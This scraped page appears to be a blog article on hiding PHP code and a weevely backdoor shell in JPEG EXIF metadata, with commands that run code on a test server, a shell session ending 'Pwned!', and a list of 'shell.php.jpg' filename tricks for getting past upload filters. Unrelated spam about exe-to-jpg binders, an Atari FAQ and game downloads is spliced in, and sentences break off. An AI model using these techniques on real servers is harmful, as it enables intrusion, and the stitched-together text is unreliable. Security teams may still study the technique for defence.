PHP Code into JPEG Metadata: From hide to unhide In i have extensively analyzed the information leakage originating from file metadata fields. In this article i will go one step further showing how an attacker can use common EXIF JPEG metadata fields to hide PHP code (or even a whole backdoor shell) into them. After the relative PoC about the effectiveness of the hide techniques, i will present some basic scanning mechanisms that can be applied in order to protect against malicious images with hidden PHP code. In order to manipulate the EXIF JPEG metadata fields, i will use the command line tool. Although, there exist many other tools out there with similar functionalities to choose for your needs. Now that we have our metadata manipulation tool lets pick up a random jpeg image and read the metadata.
Root@testbed: ~# jhead image.jpg File name: image.jpg File size: 182007 bytes File date: 2011:09:07 21:20:10 Resolution: 1197 x 478 Comment. Root@testbed: ~# curl -d cmd=id gid=33(www-data) groups=33(www-data) Bingo!
The command has been successfully executed in the target machine. The garbage at the begging of the output is caused by the data of the image’s header. Something that must be mentioned here, is that some php configurations might have passthru included into their disabled functions.
In that case you can choose a similar function like system, exec, shell_exec etc. Now that we have confirmed that our technique is working lets hide a whole php backdoor shell in the comment field of the same image. For that purpose i will choose the php shell, but you can choose an alternative shell that you have in your pentest arsenal. Initially we create the shell with the weevely script and then copy the generated php code into the metadata comment field. Root@testbed: weevely#./weevely.py -t -p admin -u Weevely 0.3 – Generate and manage stealth PHP backdoors. Copyright (c) 2011-2012 Weevely Developers Website: + Using method ‘system()’. + Retrieving terminal basic environment variables.
Bat To Exe Converter converts batch (bat) script files to executable (.exe) files. Features: Extended commands Visible and invisible applications. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES. RFI scanner V2.0; Local. Exe file binder; Local. Exe Jpg File Binder V2 550 Am Radio. Atari 8- Bit Computers: Frequently Asked Questions. Paddle #6 Trigger. Potentiometer Scan 5 (POKEY) (returns values from 2.
[www-data@webtestbed /var/www/media] ls image.jpg [www-data@webtestbed /var/www/media] id uid=33(www-data) gid=33(www-data) groups=33(www-data) [www-data@webtestbed /var/www/media] Pwned! We have apache user (www-data) privileges access to the target machine. Ok now lets move from the dark to the white side. We need to establish a protection mechanism for files that contain malicious code inside their metadata fields.
Tarzan Game Free Download For Pc. Lately i have extensively used the scanner, so i decided to give it a try with the malicious images. Lets scan the whole www dir and see what the report says. AnestisbFebruary 15th, 2013 at 15:26 @hmmm The article was written as a reference example of a specific technique that can be used to execute server side code stored into EXIF metadata. It does not provide a fully applicable exploitation path.
The entry point for the.htaccess edit and/or creation may vary from setup to setup and might not be possible under certain scenarios. The.htaccess manipulation is out of scope on this article, although some common entry points include: misconfigured ftp access to www paths, misconfigured plugins/addons from frameworks that handle htaccess files, insecure cpanels etc. February 10th, 2014 at 03:15 upload this as a.swf and on plugins you can also try to put a backshell encoded gzinflate script, if you’d really like to do the thinking like the code above, The vulnerability which we are about to demonstrate in my opinion is the number 1 reason why websites hacked and are exploited further to the server level. When a hacker performs a SQL Injection attack on a website he needs a way to get shell level access and install the PHP backdoor so he can touch other files on server or compromise the server itself if it’s vulnerable.
If we could secure our uploads and restrict our upload area so that they don’t allow it does not allow the upload of other files instead of images we can protect our upload area. However there is a problem, The PHP files can still be uploaded by various methods. The most common method is by renaming the PHP backdoor to the following and then uploading the shell.
Shell.php.jpg shell.php.jpg shell.php.jpg shell.php.jpg shell.php.jpg:; shell.php.jpg%; shell.php.jpg; shell.php.jpg; shell.php.jpg:;However there is also a method to block the upload of the above files. But there is also another way to bypass it even if the uploading of the files name with the above extension is blocked. We will use tamper data for this purpose.